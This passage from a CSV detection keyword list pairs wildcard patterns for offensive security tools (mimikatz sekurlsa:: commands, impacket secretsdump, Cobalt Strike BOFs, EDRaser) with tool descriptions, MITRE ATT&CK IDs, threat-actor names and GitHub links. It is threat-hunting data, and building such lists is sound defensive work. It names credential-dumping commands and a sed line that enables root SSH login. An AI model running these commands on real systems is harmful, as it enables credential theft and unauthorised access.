JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*secrets/secrets_manager/secrets.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*secrets_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*secrets_dump_dcsync*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*secretsdump *--silent*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*secretsdump -sam *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - 
TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*secretsdump*","offensive_tool_keyword","POC","Zerologon CVE exploitation (could be other malicious tools too)","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" +"*secretsdump.*.pyc*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*secretsdump.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*secretsdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*secretsdump.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*secretsdump.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*secretsdump.py*","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*secretsquirrel/the-backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*sec-shinject *","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*securesocketfunneling*","offensive_tool_keyword","securesocketfunneling","Secure Socket Funneling (SSF) is a network tool and toolkit It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer","T1071.001 - T1573 - T1572","TA0003 - TA0009 - ","N/A","N/A","POST Exploitation tools","https://securesocketfunneling.github.io/ssf/#home","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*security-onion*","offensive_tool_keyword","security-onion","Security Onion is a free and open source Linux distribution for threat hunting. enterprise security monitoring. and log management. It includes Elasticsearch. Logstash. Kibana. Snort. Suricata. Bro. Wazuh. Sguil. Squert. NetworkMiner. and many other security tools. 
The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes","T1059 - T1059.001 - T1059.003 - T1059.004","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Infosec Operation system","https://github.com/Security-Onion-Solutions/security-onion","1","1","N/A","N/A","10","3033","534","2021-04-16T12:14:31Z","2015-03-24T20:15:23Z" +"*securitywithoutborders*","offensive_tool_keyword","Github Username","pentest documentations","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/securitywithoutborders","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*sed 's/#PermitRootLogin prohibit-password/PermitRootLogin Yes' /etc/ssh/sshd_config*","greyware_tool_keyword","sed","allowing root login for ssh","T1078 - T1078.003 - T1021 - T1021.004","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*SeeYouCM-Thief.git*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*SeeYouCM-Thief-main*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*sekurlsa *","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - 
T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::bootkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::cloudap*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::credman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::dpapi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::dpapisystem*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::ekeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
This function dumps DPAPI backup keys for users who have logged on to the system","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::kerberos*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::krbtgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::livessp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
This function retrieves plaintext credentials from the LSA secrets in memory.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::minidump*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::msv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::process*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::pth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*sekurlsa::ssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*sekurlsa::tickets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*sekurlsa::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*sekurlsa::tspkg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*sekurlsa::wdigest*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*SELECT * FROM EvilSignature*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z"
+"*SELECT * FROM EvilSignature*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
